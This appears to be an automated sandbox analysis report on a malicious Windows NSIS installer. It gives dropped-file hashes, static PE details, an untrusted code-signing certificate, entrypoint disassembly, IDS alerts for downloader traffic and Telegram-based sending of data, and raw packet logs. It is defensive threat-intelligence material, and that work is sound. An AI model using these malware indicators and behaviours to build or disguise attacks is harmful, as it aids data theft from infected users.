                                                                                                                                                                          MD5:EB71C6BE6D08F8A7C7C9DA1335DF04C1
                                                                                                                                                                          SHA1:7B57A40E3F6C44178A25EF465C3E7F5EA3184335
                                                                                                                                                                          SHA-256:D1D5BFF683EDC3A076382FCFE8C8A28EA1FF6A1C7731A80BAB8FFF0E82A54D07
                                                                                                                                                                          SHA-512:5ED43E9E6A66F981DEEC765A13A361BCCEFE4E1A38C6847F9DB00F2ED1BF50497E36B6D5398190FB2CB0B191E4DA33A77C7378CDB446169941C84776D7406A48
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...................[.....................................................................................................................................................................................................................uV.......................................................................................................................>......................................................................................................................................................................................................................................................................................................................................................................................................`..............................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\overcutter.txt

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):465
                                                                                                                                                                          Entropy (8bit):4.255544231677184
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:ZR1EOIygKJPTYEO/OAOLkKARrQdNJdKiXkB9MOyFCZ60WgE:9xIyPtYEO/vlK6QUlE
                                                                                                                                                                          MD5:2F8A39C6A08A57605F1965012760D560
                                                                                                                                                                          SHA1:4607DE528A646C0758D7FB322CF9CCFFAFA026B8
                                                                                                                                                                          SHA-256:37909462973046DA9CD15B9FB1CCD7F92D97C26AF08C83A8D486BA411DC69373
                                                                                                                                                                          SHA-512:0B2F239E494FCEE5D18812D98E3571F20B049CAF11CEA675CB55E95283A6E99E7A854DD87087EC5F7C402B7A7C760A1AB4B399EA17319C1F9249465E542E2D8D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:pachydermateous bomuldsskjorterne redisseisin minimalists.delikatessehandlens standardfilnavn spillerelater,udstafferingers parallelforskydning ynglepladsernes libanons somatotypically inveigler sammenrendets..tyrannierne coeternally kommandrs colliquative gonidic ringetonen issens hyperanabolic unpicturesque..sminker apporterende campaigner gorvarehandlen radiosender bibelskes.logikfamilier neurotransmission pasfotoerne searchment inrighted couphgens toadfish,

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\tommelskruerne.afs

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2537825
                                                                                                                                                                          Entropy (8bit):0.15731061171505112
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:ZfmQIC91KjqGcnL63MV1HZDQDVlybvFG7dH9Sf12lqM1FBQWEP3dNaRrwPu1Br0O:Rrc
                                                                                                                                                                          MD5:6462B1502F14E3329E79F164F0B8EDA9
                                                                                                                                                                          SHA1:70F60B7634B75DAFA601D70E812D7127F4432AD3
                                                                                                                                                                          SHA-256:50852368EB9E21692315077EB7DD5E833B4430342695CFF4E70FEF7DF59DCFB7
                                                                                                                                                                          SHA-512:979F463C29EFDE5C746CE6A34B72DC064BDB9364702C5DB24B567E823B6992E076BDB160979330EDDDA03F9AE4EEB20FD1E656337A2654E43B3B36673820CF45
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...............M....................................................................4.......................................................................................................................R.......{......................................................................k............................................................................................................................................................................................................................................................................................................................................................................................................................................................~.............................................................................................................................................................I.................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dll

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):7168
                                                                                                                                                                          Entropy (8bit):5.298362543684714
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                                                                                                                                                                          MD5:675C4948E1EFC929EDCABFE67148EDDD
                                                                                                                                                                          SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                                                                                                                                                                          SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                                                                                                                                                                          SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Justificante pago-09453256434687.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: pedido-035241.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: uu8v4UUzTU.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: uu8v4UUzTU.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Entropy (8bit):7.97281774973227
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:fGu8xWoMrg.exe
                                                                                                                                                                          File size:1'119'496 bytes
                                                                                                                                                                          MD5:487fad16da392c87fb894a6ccbd95870
                                                                                                                                                                          SHA1:16f4935ce6d245d535f23a1557b6f0e0ad77baa9
                                                                                                                                                                          SHA256:2bbb66a5bad18e8ca2fee4fec0bfc6ce83b1cc4852d712c986685f095b3589ce
                                                                                                                                                                          SHA512:bbb60d3e7a24964e100ea583bd701dbf1b1ebffb44fd03de5f6c096b87de8ded04e7ece05dd28995eb2bcdf1e3cdb1fcaa11078277cba3b41af1a5c4b8e04b59
                                                                                                                                                                          SSDEEP:24576:zNrNYogUzS7ZTdlfjS03VwV5k7j5awX300zQUGtZc:Z+JI2Jj3VwXgj5aEkHUGtZc
                                                                                                                                                                          TLSH:AF35234021D6F033D0B19A3BE6395CF163E9AC31C6725B2F13157F09BA796623A2D356
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

                                                                                                                                                                          File Icon

                                                                                                                                                                          Icon Hash:4e33695d030a3f39

                                                                                                                                                                          Static PE Info

                                                                                                                                                                          General

                                                                                                                                                                          Entrypoint:0x4034f7
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                          Signature Issuer:CN=focometry, E=Uncapering@Mangold.Ans, O=focometry, L=Monon, OU="Mannoses Conventicular ", S=Indiana, C=US
                                                                                                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                          Error Number:-2146762487
                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                          • 24/12/2023 08:18:04 23/12/2024 08:18:04
                                                                                                                                                                          Subject Chain
                                                                                                                                                                          • CN=focometry, E=Uncapering@Mangold.Ans, O=focometry, L=Monon, OU="Mannoses Conventicular ", S=Indiana, C=US
                                                                                                                                                                          Version:3
                                                                                                                                                                          Thumbprint MD5:CAFF9D70A82A47086A02432BA34E47D5
                                                                                                                                                                          Thumbprint SHA-1:3441E08EA76A7351719C2FE3A63CBBDC93E7C06E
                                                                                                                                                                          Thumbprint SHA-256:B82825F7DBC8AA58D5850201B206CAEA35BC2B8AA8D2770A373DEC412F3059D3
                                                                                                                                                                          Serial:6CD8D88855E505EF8F1559CDA17967E6E882B8B6

                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                          Instruction
                                                                                                                                                                          push ebp
                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                          sub esp, 000003F4h
                                                                                                                                                                          push ebx
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          push 00000020h
                                                                                                                                                                          pop edi
                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                          push 00008001h
                                                                                                                                                                          mov dword ptr [ebp-14h], ebx
                                                                                                                                                                          mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                                                          mov dword ptr [ebp-10h], ebx
                                                                                                                                                                          call dword ptr [004080CCh]
                                                                                                                                                                          mov esi, dword ptr [004080D0h]
                                                                                                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                          push eax
                                                                                                                                                                          mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                                                          mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                          mov dword ptr [ebp-28h], ebx
                                                                                                                                                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                                                          call esi
                                                                                                                                                                          test eax, eax
                                                                                                                                                                          jne 00007F7D84814F5Ah
                                                                                                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                          mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                                          push eax
                                                                                                                                                                          call esi
                                                                                                                                                                          mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                                          mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                                          sub ax, 00000053h
                                                                                                                                                                          add ecx, FFFFFFD0h
                                                                                                                                                                          neg ax
                                                                                                                                                                          sbb eax, eax
                                                                                                                                                                          mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                                          not eax
                                                                                                                                                                          and eax, ecx
                                                                                                                                                                          mov word ptr [ebp-2Ch], ax
                                                                                                                                                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                                          jnc 00007F7D84814F2Ah
                                                                                                                                                                          and word ptr [ebp-00000132h], 0000h
                                                                                                                                                                          mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                                          movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                                          mov dword ptr [0042A2D8h], eax
                                                                                                                                                                          xor eax, eax
                                                                                                                                                                          mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                                          movzx eax, ax
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                          mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                                          movzx ecx, cx
                                                                                                                                                                          shl eax, 10h
                                                                                                                                                                          or eax, ecx

                                                                                                                                                                          Rich Headers

                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                          Data Directories

                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x159b8.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x110e000x708
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                          Sections

                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x10000x65150x660026e66bea3b62728a217ae7bf343ebc1aFalse0.6615349264705882data6.439707948554623IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rdata0x80000x139a0x1400691f0273dad50ec603f6fedf850b58eeFalse0.45data5.145774564074664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .data0xa0000x203380x6004b75405561a3fcc45b8fe27a6808f3b5False0.4993489583333333data4.013698650446401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .ndata0x2b0000x290000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .rsrc0x540000x159b80x15a0099e35a8b4499e294dd3cd1daedb48858False0.8200754154624278data7.353353976387772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                          Resources

                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                          RT_ICON0x544180x9e8cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9934217009953681
                                                                                                                                                                          RT_ICON0x5e2a80x3344PNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9758457787259982
                                                                                                                                                                          RT_ICON0x615f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.41275933609958504
                                                                                                                                                                          RT_ICON0x63b980x1743PNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States0.9952980688497062
                                                                                                                                                                          RT_ICON0x652e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4580206378986867
                                                                                                                                                                          RT_ICON0x663880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.5692963752665245
                                                                                                                                                                          RT_ICON0x672300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.6601985559566786
                                                                                                                                                                          RT_ICON0x67ad80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.5
                                                                                                                                                                          RT_ICON0x681400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.5238439306358381
                                                                                                                                                                          RT_ICON0x686a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6063829787234043
                                                                                                                                                                          RT_ICON0x68b100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.6747311827956989
                                                                                                                                                                          RT_ICON0x68df80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.8074324324324325
                                                                                                                                                                          RT_DIALOG0x68f200x100dataEnglishUnited States0.5234375
                                                                                                                                                                          RT_DIALOG0x690200x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                          RT_DIALOG0x691400xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                          RT_DIALOG0x692080x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                          RT_GROUP_ICON0x692680xaedataEnglishUnited States0.632183908045977
                                                                                                                                                                          RT_VERSION0x693180x274dataEnglishUnited States0.47611464968152867
                                                                                                                                                                          RT_MANIFEST0x695900x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076

                                                                                                                                                                          Imports

                                                                                                                                                                          DLLImport
                                                                                                                                                                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                                                                          Possible Origin

                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                          Network Behavior

                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                          2025-01-10T19:17:25.955766+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549905142.250.185.174443TCP
                                                                                                                                                                          2025-01-10T19:17:30.902465+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549937132.226.247.7380TCP
                                                                                                                                                                          2025-01-10T19:17:32.355634+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549937132.226.247.7380TCP
                                                                                                                                                                          2025-01-10T19:17:33.182363+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549955104.21.96.1443TCP
                                                                                                                                                                          2025-01-10T19:17:34.605637+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549960193.122.6.16880TCP
                                                                                                                                                                          2025-01-10T19:17:35.149863+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549969104.21.96.1443TCP
                                                                                                                                                                          2025-01-10T19:17:47.167816+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549997149.154.167.220443TCP
                                                                                                                                                                          2025-01-10T19:17:53.897388+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549998149.154.167.220443TCP
                                                                                                                                                                          2025-01-10T19:17:56.507059+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550000149.154.167.220443TCP

                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                          TCP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Jan 10, 2025 19:17:24.815556049 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:24.815603971 CET44349905142.250.185.174192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:24.815778971 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:24.831197023 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:24.831234932 CET44349905142.250.185.174192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.568924904 CET44349905142.250.185.174192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.569010973 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:25.569706917 CET44349905142.250.185.174192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.569775105 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:25.627352953 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:25.627413034 CET44349905142.250.185.174192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.627844095 CET44349905142.250.185.174192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.627981901 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:25.629781008 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:25.671374083 CET44349905142.250.185.174192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.955779076 CET44349905142.250.185.174192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.955838919 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:25.955863953 CET44349905142.250.185.174192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.955904007 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:25.956127882 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:25.956165075 CET44349905142.250.185.174192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.956219912 CET49905443192.168.2.5142.250.185.174
                                                                                                                                                                          Jan 10, 2025 19:17:25.989639997 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:25.989667892 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.989731073 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:25.990130901 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:25.990145922 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:26.632980108 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:26.633058071 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:26.638583899 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:26.638598919 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:26.638936996 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:26.639033079 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:26.639905930 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:26.683341026 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.665683985 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.665762901 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.665807009 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.665831089 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.665846109 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.665870905 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.672418118 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.672502995 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.672503948 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.672523022 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.672569990 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.672595024 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.672641039 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.672651052 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.672689915 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.672698021 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.672728062 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.672734976 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.672743082 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.672791004 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.672797918 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.672859907 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.673472881 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.673532009 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.673538923 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.673588037 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.673618078 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.673624039 CET44349916216.58.212.161192.168.2.5
